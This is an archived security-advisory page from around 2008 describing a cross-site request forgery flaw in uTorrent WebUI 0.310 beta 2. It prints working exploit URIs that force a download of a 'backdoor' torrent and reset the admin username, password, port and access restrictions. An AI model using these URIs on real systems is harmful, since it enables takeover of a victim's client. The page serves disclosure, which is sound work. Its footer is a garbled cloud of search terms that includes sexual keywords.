about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , uTorrent WebUI Cross-Site Request Forgery Vulnerability


Title uTorrent WebUI Cross-Site Request Forgery Vulnerability
Published 2008-04-18-12:00AM
Updated 2008-04-21-02:37PM
Class Design Error
CVE  
Remote  Yes
Local  No
Credit  th3.r00k
Vulnerable  uTorrent WebUI 0.310 beta 2
Not Vulnerable  
Code  To exploit this issue, an attacker must entice an unsuspecting victim into following a malicious URI.The following example URIs are available:To force a file download:
http://www.example.com:8080/gui/?action=add-url&s=http://localhost/backdoor.torrentTo change administrative credentials and settings:
http://www.example.com:8080/gui/?action=setsetting&s=webui.username&v=badmin
http://www.example.com:8080/gui/?action=setsetting&s=webui.password&v=badmin
http://www.example.com:8080/gui/?action=setsetting&s=webui.port&v=4096 http://www.example.com:8080/gui/?action=setsetting&s=webui.restrict&v=127.0.0.1/24,10.1.1.1
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 22:03:21 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
wwwwwww. aub 066 /search/ex pareja inf 98/ php-nuke 2 DCP-Portal Schlabo manisha ko Sex gorgia mambo Remo bash Www.desi m wap.phonor schwanger Fuckingsex porn 3gp Female nak deepika pa sridevi Shakeela.x HTML Injec Searching www.szteji Www.des phbb 2.0.4 Nude photo Adjd sexir PHP 4.4.4 hotwallpep sex tv ... com film seks ProFTPD AU cardmemax www.Nakeda Www.sexi89 www.qiansh www.sexyi junsai.com wapFORsex. nancy ajra news for c FTP server news for c Kernel 2.6 groups.php brooke bur